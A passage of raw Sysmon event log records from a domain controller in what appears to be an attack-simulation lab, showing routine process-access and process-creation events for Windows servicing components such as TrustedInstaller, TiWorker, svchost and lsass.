84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001101Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.285{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001100Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.285{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001099Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.285{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001098Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.285{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001097Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001096Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001095Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.269{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001094Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.269{D28789B6-7C6A-5FA1-2600-000000008801}30642132C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{D28789B6-7C6A-5FA1-2500-000000008801}3024C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001093Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.269{D28789B6-7C6A-5FA1-2600-000000008801}30642132C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{D28789B6-7C6A-5FA1-2500-000000008801}3024C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000001092Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.222{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C6A-5FA1-2600-000000008801}3064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001091Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.222{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C6A-5FA1-2600-000000008801}3064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001090Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.222{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C6A-5FA1-2600-000000008801}3064C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001089Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.223{D28789B6-7C6A-5FA1-2600-000000008801}3064C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe10.0.14393.3926 (rs1_release.200817-1737)Windows Modules Installer WorkerMicrosoft® Windows® Operating SystemMicrosoft CorporationTiWorker.exeC:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe -EmbeddingC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=A8CBBA3111CF28435F7E8C8B94EC6FBD,SHA256=D4DDF9F7CB94FE55C7EA1CA90AB9638A883B84308C858EF466554E32FB17EFC3,IMPHASH=38FF53C1CCC1EE4C508C0F83A88C4E19{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000001088Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.206{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C6A-5FA1-2500-000000008801}3024C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001087Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.175{D28789B6-7C62-5FA1-0A00-000000008801}852936C:\Windows\system32\services.exe{D28789B6-7C6A-5FA1-2500-000000008801}3024C:\Windows\servicing\TrustedInstaller.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\services.exe+18ff|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001086Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.160{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C6A-5FA1-2500-000000008801}3024C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000001085Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.160{D28789B6-7C62-5FA1-0A00-000000008801}852940C:\Windows\system32\services.exe{D28789B6-7C6A-5FA1-2500-000000008801}3024C:\Windows\servicing\TrustedInstaller.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\services.exe+12939|C:\Windows\system32\services.exe+66f4|C:\Windows\system32\services.exe+5154|C:\Windows\system32\services.exe+d7ae|C:\Windows\system32\services.exe+4c6c|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000001084Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.168{D28789B6-7C6A-5FA1-2500-000000008801}3024C:\Windows\servicing\TrustedInstaller.exe10.0.14393.3564 (rs1_release.200303-1942)Windows Modules InstallerMicrosoft® Windows® Operating SystemMicrosoft CorporationTrustedInstaller.exeC:\Windows\servicing\TrustedInstaller.exeC:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=187076E4BC7B2F5FB7D54D1234B3CDEA,SHA256=7AE4CC64E2F0E5C58ABB6542233DA78B9AEAAD22C9D853AB96265EF3FBFEFABE,IMPHASH=648F735E453FC6802BFAECAC5ACA72A4{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\System32\services.exeC:\Windows\system32\services.exe 10341000x80000000000000001083Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.160{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001082Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f86b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001081Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.160{D28789B6-7C64-5FA1-0C00-000000008801}608712C:\Windows\system32\svchost.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+f71b|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001080Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.160{D28789B6-7C62-5FA1-0B00-000000008801}868900C:\Windows\system32\lsass.exe{D28789B6-7C62-5FA1-0A00-000000008801}852C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001079Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001078Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.144{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001077Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 